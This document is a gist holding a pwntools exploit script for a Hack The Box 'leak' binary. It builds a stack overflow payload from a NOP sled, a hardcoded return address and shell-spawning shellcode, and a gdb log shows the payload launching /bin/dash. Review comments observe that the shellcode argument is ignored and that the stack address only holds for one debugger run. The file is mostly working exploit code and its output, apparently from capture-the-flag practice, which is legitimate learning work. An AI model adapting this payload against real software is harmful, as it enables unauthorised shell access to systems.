@dualfade
Created March 14, 2019 22:23
pwntools BO EUID Exec test --
#!/usr/bin/env python
import struct
from pwn import *
def gen_payload(start_addr, shellcode):
    """Build the overflow payload used to test the `leak` binary.

    Layout, in order: a 72-byte NOP sled, the 8-byte little-endian
    `start_addr`, 16 more NOPs, then the machine code.

    Args:
        start_addr: integer written over the saved return pointer; packed
            with struct as an unsigned little-endian 64-bit value.
        shellcode: accepted for interface compatibility but currently
            ignored — the embedded code is always shellcraft.amd64.sh().

    Returns:
        bytes: the raw payload.

    Side effect: sets pwntools' global `context.arch` to 'amd64'.
    """
    context.arch = 'amd64'
    nop_byte = asm('nop', arch="amd64")
    ret_addr = struct.pack("<Q", start_addr)
    # The `shellcode` argument is not assembled; the sh() stub is used instead.
    code = asm(shellcraft.amd64.sh(), arch='amd64')
    # sled | return address | padding NOPs | code
    parts = [nop_byte * 72, ret_addr, nop_byte * 16, code]
    return b"".join(parts)
# ret --
# x $rsp
# 0x7fffffffcf98: rex.WB
# Target address: the $rsp value noted above plus 8.
# NOTE(review): this is a fixed stack address captured from one debugger run;
# it will not hold if the stack layout differs (ASLR enabled, different
# environment or loader) — confirm against a fresh leak before reuse.
a = 0x7fffffffcf98+8
# NOTE: gen_payload ignores its second argument and always embeds
# shellcraft.amd64.sh(), so this exit() stub is not what ends up in the
# payload (the gdb log below shows /bin/dash being executed).
payload = gen_payload(a,
                      shellcraft.amd64.linux.exit())
# Write the raw bytes so they can be redirected into the target's stdin
# (`r < v_pload` in the gdb notes below).
with open("./v_pload", "wb") as f:
    f.write(payload)
"""
__ EOF __
"""
gdb -q ./leak
m*main+64
r < v_pload
c
gdb -q ./leak
Reading symbols from ./leak...(no debugging symbols found)...done.
gdb-peda$ disa
disable disassemble
gdb-peda$ quit
gdb -q ./leak
Reading symbols from ./leak...(no debugging symbols found)...done.
gdb-peda$ r < v_pload
Starting program: /home/cdowns/Documents/Hack_The_Box/Fortress/leak < v_pload
Oops, I'm leaking! 0x7fffffffcf50
Pwn me ¯\_(ツ)_/¯
> process 10036 is executing new program: /bin/dash
[Inferior 1 (process 10036) exited normally]
Warning: not running or target is remote
gdb-peda$